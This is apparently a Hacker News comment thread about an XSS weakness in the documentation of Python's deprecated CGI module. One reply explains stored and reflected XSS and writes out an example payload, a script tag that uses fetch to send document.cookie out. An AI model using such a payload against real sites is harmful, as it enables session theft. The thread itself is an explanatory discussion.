mont_tag 10 hours ago

ISTM the post has a somewhat nasty and judgmental tone. Instead of saying, "ha ha, gotcha!", an issue could have been filed on GitHub and it would have been quickly fixed. Instead, the OP seems to be publicity seeking. IMO, this isn't worthy of being on Hacker News.

  • easterncalculus 9 hours ago

    Plus the Full Disclosure mailing list is generally for products, or at least open source projects. "Your docs could lead people to do bad things" is a serious stretch.

parhamn 10 hours ago

My first thought was "who's still using CGI?" then I read the docs:

> Deprecated since version 3.11, will be removed in version 3.13

  • dec0dedab0de 10 hours ago

    im surprised it made it anywhere in 3.x

dec0dedab0de 10 hours ago

does it count as cross site scripting if there is no way to send the result to someone else?

  • underlines 10 hours ago

    if you can prefill the form field with post parameters and send that URL to someone else, then you can steal their login cookies etc. Even though the same user who submits the input sees the response, XSS can be exploited:

    1. stored XSS (input is saved and later displayed)

    Input is stored in a DB or a file and later displayed on the webpage, any future user viewing that page would also execute the malicious script.

    Example: attacker submits <script>fetch('' + document.cookie)</script>. If this is stored and later displayed, it will run for all users.

    2. Immediate XSS

    If you can trick another user into clicking a malicious link containing the script, it will execute in their browser.


    If the CGI script prints this without sanitization, the victim's browser executes the script, jackpot you get their session cookies.

    3. Browser Exploits

    And for all of the above, you could use an XSS payload with a 0 day browser exploit to gain whatever privileges.

    • cosmotic 9 hours ago

      A content security policy should prevent that specific attack vector, though similar might work.

kittikitti 11 hours ago

"If you don't Read The Fine Manual then you are uninformed, if you read it you are disinformed." This is a gem! There should be more disclaimers in the documentation about potential vulnerabilities like XSS.